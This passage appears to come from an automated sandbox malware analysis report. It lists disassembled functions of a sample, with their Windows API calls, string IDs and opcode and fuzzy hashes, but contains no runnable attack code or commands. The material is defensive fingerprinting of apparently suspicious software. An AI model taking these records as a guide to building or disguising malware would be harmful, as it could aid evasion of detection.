                                                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                        • String ID: \VH
                                                                                        • API String ID: 2507767853-234962358
                                                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                        • String ID: crts
                                                                                        • API String ID: 943502515-3724388283
                                                                                        • Opcode ID: 3fc01f6affe693cc24f25e2fc7637460d04805ab5607173d16afdd214e1cc27c
                                                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                        • Opcode Fuzzy Hash: 3fc01f6affe693cc24f25e2fc7637460d04805ab5607173d16afdd214e1cc27c
                                                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$LabelVolume
                                                                                        • String ID: \VH
                                                                                        • API String ID: 2006950084-234962358
                                                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                        • DrawMenuBar.USER32 ref: 00449761
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                                                        • String ID: 0
                                                                                        • API String ID: 772068139-4108050209
                                                                                        • Opcode ID: 0735be47179a236d62f0b3ee7ec9ab542aee013fdc902971e67a57cc85d2bea2
                                                                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                        • Opcode Fuzzy Hash: 0735be47179a236d62f0b3ee7ec9ab542aee013fdc902971e67a57cc85d2bea2
                                                                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_wcscpy
                                                                                        • String ID: 3, 3, 8, 1
                                                                                        • API String ID: 3469035223-357260408
                                                                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                        • API String ID: 2574300362-3530519716
                                                                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                                                        • API String ID: 2574300362-275556492
                                                                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                                                        • API String ID: 2574300362-58917771
                                                                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                        • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                        • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                        • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                        • __itow.LIBCMT ref: 004699CD
                                                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                        • __itow.LIBCMT ref: 00469A97
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
